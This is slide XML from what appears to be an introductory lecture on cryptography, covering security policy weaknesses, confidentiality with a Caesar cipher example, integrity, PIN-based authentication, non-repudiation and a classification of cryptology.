                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="3000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2800350" y="4443413"/>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0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Cryptography</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="MCj043149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2743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MCj0431520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2714625"/>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p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3581400" y="2071688"/>
              <a:ext cx="2063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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Cryptology</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4533900" y="32766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0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>+</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5029200" y="4443413"/>
              <a:ext cx="1516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0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Cryptanalysis</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3397484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Security Policy Weaknesses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135"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Lack of written security policy</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Software and hardware installation and changes do not follow policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-34272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Disaster recovery plan is nonexistent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smtClean="0"/>
              <a:t>The Challenge that We Face </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44034" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2054882"/>
            <a:ext cx="7772400" cy="3738836"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393524050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Securing Communications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"Cryptography is about communications in the presence of adversaries"  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Rivest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Goals: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="3733800"/>
            <a:ext cx="6238875" cy="1409700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9271065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9" descr="parchment_bln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81150"/>
            <a:ext cx="56388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noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1981200"/>
            <a:ext cx="2584450" cy="4252913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Julius Caesar would send encrypted messages to his generals in the battlefield.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Even if intercepted, his enemies usually could not read or decipher the messages. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16389" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1408113" y="3003550"/>
            <a:ext cx="43830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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>I O D Q N H D V W </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>D W W D F N D W G D Z Q</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27111589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spect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integrity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>An unbroken wax seal on an envelop ensures integrity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The unique unbroken seal ensures no one has read the contents.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15364"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810000"/>
            <a:ext cx="3125788" cy="244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376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spect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>An ATM Personal Information Number (PIN) is required for authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The PIN is a shared secret between a bank account holder and the financial institution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 6" descr="42-18832731"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="8417"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="1676400"/>
            <a:ext cx="2819400" cy="258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3375" y="4572000"/>
            <a:ext cx="45434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43375" y="6054090"/>
            <a:ext cx="4543425" cy="3139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eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D16349">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Challenge response authentication protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D16349">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24607139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Non-Repudiation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source repudiation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: provides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>assurance to the recipient that the message was actually originated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sender and not someone masquerading as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Message repudiation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: prevents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the sender from claiming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>they never sent the message in the first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Offered by Public Key Crypto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26011162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dirty="0" smtClean="0"/>
              <a:t>Classification of the Field of Cryptology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 54"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4932363" y="1874837"/>
            <a:ext cx="1800225" cy="463550"/>
            <a:chOff x="3107" y="754"/>
            <a:chExt cx="1134" cy="292"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="AutoShape 21"/>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9" name="Text Box 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3243" y="754"/>
              <a:ext cx="5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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="de-DE" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Text Box 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3152" y="819"/>
              <a:ext cx="10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2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Cryptology</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 62"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3132138" y="2338387"/>
            <a:ext cx="5329237" cy="1079500"/>
            <a:chOff x="1973" y="1046"/>
            <a:chExt cx="3357" cy="680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 55"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1973" y="1454"/>
              <a:ext cx="1134" cy="272"/>
              <a:chOff x="1973" y="1454"/>
              <a:chExt cx="1134" cy="272"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="AutoShape 23"/>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21" name="Text Box 31"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2018" y="1499"/>
                <a:ext cx="10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2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Cryptography</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Group 56"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4196" y="1454"/>
              <a:ext cx="1134" cy="272"/>
              <a:chOff x="4196" y="1454"/>
              <a:chExt cx="1134" cy="272"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="AutoShape 22"/>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19" name="Text Box 32"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4241" y="1499"/>
                <a:ext cx="10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2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Cryptanalysis</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Line 40"/>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15" name="Line 41"/>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16" name="Line 42"/>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17" name="Line 43"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 63"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="3417887"/>
            <a:ext cx="6408738" cy="1225550"/>
            <a:chOff x="521" y="1726"/>
            <a:chExt cx="4037" cy="772"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Group 57"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="521" y="2226"/>
              <a:ext cx="1135" cy="272"/>
              <a:chOff x="521" y="2226"/>
              <a:chExt cx="1135" cy="272"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="AutoShape 26"/>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36" name="Text Box 33"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="567" y="2271"/>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1400" b="1">
                    <a:solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Symmetric Ciphers</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="Group 58"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1973" y="2226"/>
              <a:ext cx="1134" cy="272"/>
              <a:chOff x="1973" y="2226"/>
              <a:chExt cx="1134" cy="272"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="33" name="AutoShape 25"/>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34" name="Text Box 34"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1973" y="2271"/>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1400" b="1">
                    <a:solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Asymmetric Ciphers</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3424" y="2225"/>
              <a:ext cx="1134" cy="272"/>
              <a:chOff x="3424" y="2225"/>
              <a:chExt cx="1134" cy="272"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="AutoShape 24"/>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32" name="Text Box 35"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3424" y="2270"/>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1400" b="1" dirty="0">
                    <a:solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Protocols </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Line 44"/>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27" name="Line 46"/>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28" name="Line 47"/>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29" name="Line 48"/>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30" name="Line 49"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="Group 64"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="252413" y="4641850"/>
            <a:ext cx="4103687" cy="1225550"/>
            <a:chOff x="159" y="2497"/>
            <a:chExt cx="2585" cy="772"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="Group 60"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="159" y="2997"/>
              <a:ext cx="1134" cy="272"/>
              <a:chOff x="159" y="2997"/>
              <a:chExt cx="1134" cy="272"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="46" name="AutoShape 28"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="159"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47" name="Text Box 36"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="204" y="3042"/>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1400" b="1">
                    <a:solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Block Ciphers</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="Group 61"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1610" y="2997"/>
